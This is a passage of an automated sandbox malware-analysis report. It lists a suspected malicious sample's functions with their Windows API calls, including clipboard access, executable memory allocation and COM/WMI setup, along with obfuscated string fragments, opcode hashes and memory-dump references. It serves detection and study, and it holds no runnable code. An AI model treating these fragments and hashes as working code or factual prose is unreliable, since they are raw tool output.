                                                                                                                                                                                                                                                                                          • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49
                                                                                                                                                                                                                                                                                          Function 0040E648 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E65A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeSecurity
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 640775948-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
                                                                                                                                                                                                                                                                                          • Instruction ID: 1ef2cd84d3f3a248c300a9315f5ba7c079722d57ce9cb5108686e78c00d3b34e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03D0C9343C434076F2654718EC57F1432119302F11F701224B323FE2E1C9D07141860C
                                                                                                                                                                                                                                                                                          Function 00438E70 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                                          • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8
                                                                                                                                                                                                                                                                                          Function 00438E47 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                          • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                                          • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                                                                                                                                                                                                                                                          Function 00438E51 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                                          • Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
                                                                                                                                                                                                                                                                                          Function 008E9F4D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008E9F9E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693514918.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 008E9000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_8e9000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                          • Instruction ID: 0cd5aced46408a83f9828b39d706291ee6d69e0dc12a40ce8dfc353cec580273
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96112B79A00208EFDB01DF99C985E98BBF5EF09751F058094F9489B362D771EA50DB81

                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                          Function 024B4891 Relevance: 127.9, Strings: 102, Instructions: 417COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
                                                                                                                                                                                                                                                                                          • API String ID: 0-1394229784
                                                                                                                                                                                                                                                                                          • Opcode ID: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
                                                                                                                                                                                                                                                                                          • Instruction ID: baf5855529d5c49cf6cfb0e88b2a8186660a83bc73687cd3c779ef1732dd6a1a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5622462190C7E9CDEB26C638CC587DDBEA15F56314F0841D9C1996B3C2C7BA0B89CB26
                                                                                                                                                                                                                                                                                          Function 0043462A Relevance: 127.9, Strings: 102, Instructions: 417COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
                                                                                                                                                                                                                                                                                          • API String ID: 0-1394229784
                                                                                                                                                                                                                                                                                          • Opcode ID: a56254765318387d5ea3dd4d584f94a84871a07d556f59630aa43d509a526f11
                                                                                                                                                                                                                                                                                          • Instruction ID: 78fde7a8102a4a25e3d516c1edb5f9b2f063fdb03dbd0bbcca9d4d838a68c62c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a56254765318387d5ea3dd4d584f94a84871a07d556f59630aa43d509a526f11
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F22472190D7E9CDEB26C638CC587DDBEA15B56314F0841D9C19D6B3C2C7BA0B89CB26
                                                                                                                                                                                                                                                                                          Function 024B42FF Relevance: 36.6, Strings: 29, Instructions: 348COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
                                                                                                                                                                                                                                                                                          • API String ID: 0-334816167
                                                                                                                                                                                                                                                                                          • Opcode ID: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
                                                                                                                                                                                                                                                                                          • Instruction ID: 25ecd6609553f32baca7714e8aeceeec93040c6e209c9c053f4265ccc1d4356a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFF1E421D087E98ADB32C67C8C543CDBFA15B53324F1943D9D4E9AB3D2C6790A46CB62
                                                                                                                                                                                                                                                                                          Function 00434098 Relevance: 36.6, Strings: 29, Instructions: 348COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
                                                                                                                                                                                                                                                                                          • API String ID: 0-334816167
                                                                                                                                                                                                                                                                                          • Opcode ID: 8a4a65c913a0549b7293d237ea660453a96265463489dae8efe8e44eb9074128
                                                                                                                                                                                                                                                                                          • Instruction ID: 4ba09c738a8091425718d315f50eff196f5ba60e1b3feeb24fdbf3622366560b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a4a65c913a0549b7293d237ea660453a96265463489dae8efe8e44eb9074128
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BF1E521D087E98ADB32C67C8C443CDBFA15B97324F1943D9D4E9AB3D2C6780A46CB56
                                                                                                                                                                                                                                                                                          Function 024B6447 Relevance: 28.6, APIs: 8, Strings: 8, Instructions: 636memorycomCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoCreateInstance.COMBASE(0043F68C,00000000,00000001,0043F67C), ref: 024B6675
                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(FA46F8B5), ref: 024B66D1
                                                                                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 024B670E
                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(w!s#), ref: 024B6762
                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(A3q5), ref: 024B6808
                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 024B687A
                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 024B69DC
                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 024B6A1A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
                                                                                                                                                                                                                                                                                          • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                                                          • API String ID: 2775254435-4124187736
                                                                                                                                                                                                                                                                                          • Opcode ID: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
                                                                                                                                                                                                                                                                                          • Instruction ID: 5b3348aa32d787808aa2bd7c848211984107a7b7c5ca6801c41b61df10d9f28a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E12EEB26083409BD714CF29C881BABBBEAFFC9304F15892DE695DB290D774D505CB92
                                                                                                                                                                                                                                                                                          Function 004310D0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                                          • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                                          • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                                          • Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                                                          • Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
                                                                                                                                                                                                                                                                                          Function 02489497 Relevance: 18.0, Strings: 14, Instructions: 458COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
                                                                                                                                                                                                                                                                                          • API String ID: 0-2345621967
                                                                                                                                                                                                                                                                                          • Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                                                          • Instruction ID: 61a7c25add3c2eb78d575bb410489b68ba99ef0bb1d486e7cf9faf3c19471fbb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03C1587160C7C58FD315DF2584A076BBFE1AFD2244F1889ADE4E11B782D739890ACB62
                                                                                                                                                                                                                                                                                          Function 00409230 Relevance: 18.0, Strings: 14, Instructions: 458COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
                                                                                                                                                                                                                                                                                          • API String ID: 0-2345621967
                                                                                                                                                                                                                                                                                          • Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                                                          • Instruction ID: bfc0c3310975af71fded0e8a17bd930ed1ccefcf7fefaebca231936fe6ab8075
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47C1367150C3958BD315CE2584A036BBFE1AFD6304F1889BDE4E11B386D63D8D0ACBA6
                                                                                                                                                                                                                                                                                          Function 0248FC64 Relevance: 17.1, Strings: 13, Instructions: 892COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
                                                                                                                                                                                                                                                                                          • API String ID: 0-2174627302
                                                                                                                                                                                                                                                                                          • Opcode ID: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
                                                                                                                                                                                                                                                                                          • Instruction ID: c47d0252fef95e795cc2f919cc7b0789bbb0f975b4fe0699cf3bf39bea5ccefd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C727D7160C7808FD724AB38C4943AFBFE2ABD6314F19892ED5DA87381D6798446CB13
                                                                                                                                                                                                                                                                                          Function 0040F9FD Relevance: 17.1, Strings: 13, Instructions: 892COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
                                                                                                                                                                                                                                                                                          • API String ID: 0-2174627302
                                                                                                                                                                                                                                                                                          • Opcode ID: 9cf973d881fcd9ddf1de5dfd39abdee776cd7d1ba05089c60c6876307f8499b0
                                                                                                                                                                                                                                                                                          • Instruction ID: 9695cd9248a7320cbd761fb78df0a02734abf8995342c504889e395b39462be9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cf973d881fcd9ddf1de5dfd39abdee776cd7d1ba05089c60c6876307f8499b0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E728E7160C7818BD3249F38C4953AFBBE2ABD5314F194A3EE5D9873D2D67884858B07
                                                                                                                                                                                                                                                                                          Function 024A8108 Relevance: 14.2, Strings: 11, Instructions: 461COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: *B)$*B)$<=$O)O+$Q5Z7$T!M#$U1D3$V%G'$XY$\9X;$p-B/
                                                                                                                                                                                                                                                                                          • API String ID: 0-898000180
                                                                                                                                                                                                                                                                                          • Opcode ID: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
                                                                                                                                                                                                                                                                                          • Instruction ID: 7284c0b006921febe605626328ca0107e5e3020dd22266af322895ab5b66acc7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DC10DB12483518BD714CF58C8A176BB7F2EFE6714F08896DE8D68B790E3358901C796
                                                                                                                                                                                                                                                                                          Function 0042B4FC Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 519COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                          • String ID: %(#}$/$/26-$1$Wu
                                                                                                                                                                                                                                                                                          • API String ID: 3664257935-3803221125
                                                                                                                                                                                                                                                                                          • Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                                                          • Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
